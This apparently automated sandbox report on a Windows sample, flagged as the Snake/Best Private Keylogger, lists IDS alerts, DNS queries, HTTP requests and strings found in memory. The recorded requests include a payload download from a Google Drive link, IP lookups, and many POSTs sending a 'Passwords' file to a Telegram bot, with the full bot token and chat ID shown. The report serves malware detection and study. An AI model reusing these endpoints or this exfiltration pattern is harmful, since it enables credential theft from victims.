Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9 -> 149.154.167.220:443, one alert per connection, from source ports 49977, 49979, 49981, 49983, 49985, 49989, 49992, 49994, 49996, 49998, 50000, 50002, 50004, 50006, 50008, 50010, 50012, 50014, 50016, 50018, 50020, 50022, 50024, 50026, 50030, 50032, 50034, 50036, 50038, 50040, 50042, 50044, 50046, 50048 (34 alerts, the same connections as SID 1810008)
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49987 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49987 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: unknown; DNS query: name: api.telegram.org
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3199e441f6db | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd31b0368823d7 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd31c24cf1dd08 | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd31d456c3dc56 | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd31e7b6fffa58 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd31f9a7e3cc8b | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd320b8d01f7ea | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3220243286cd | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd32334eab1922 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3247c90beef3 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd325ad854f9ca | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3275fbf52428 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3288eb61d7c5 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd329a73bbadd4 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd32aea0643760 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd32cc1b350f07 | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd32e17780006a | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd32f2c5d2fb99 | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd33055b4f13ff | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3317e34e673a | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd332a5d9f9c69 | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd333ccb7fd9d3 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3351cb172d67 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd336809ef4d50 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd337ceb19b4f4 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3395a3db7cbe | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd33abb28677f1 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd33c5920c0b5c | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd33df5e6a49aa | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd33fe3ac1ecdf | Host: api.telegram.org | Content-Length: 1090
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd341f90415bea | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd343e3f0cbb2f | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd34647c437859 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd348d28405116 | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd34b0a4c9392c | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd319a08d3505f | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
            Source: Joe Sandbox View; IP Address: 149.154.167.220
            Source: Joe Sandbox View; IP Address: 104.21.96.1
            Source: Joe Sandbox View; IP Address: 132.226.247.73
            Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown; DNS query: name: checkip.dyndns.org
            Source: unknown; DNS query: name: reallyfreegeoip.org
            Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49980 -> 132.226.247.73:80
            Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49978 -> 132.226.247.73:80
            Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49975 -> 132.226.247.73:80
            Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49972 -> 216.58.206.46:443
            Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
            Source: global traffic; HTTP traffic detected: GET /download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
            Source: unknown; HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49976 version: TLS 1.0
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd3199e441f6db | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndn
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: rXKfKM0T49.exe, 00000003.00000003.2543321683.000000003795A000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.2543443551.000000003796F000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.2543377009.0000000037966000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2652880630.0000000037970000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2652751843.000000003793F000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.2543260103.0000000037946000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: rXKfKM0T49.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000358FF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003583C000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035827000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgL
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005200000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: rXKfKM0T49.exe, 00000003.00000002.2629258002.0000000006CA0000.00000004.00001000.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh
Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYhy
Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000527B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/#&
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download
Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download?
Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=downloadf
Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=downloadh
Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=downloadid
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ec
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49972 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49974 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49977 version: TLS 1.2
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_0040558F
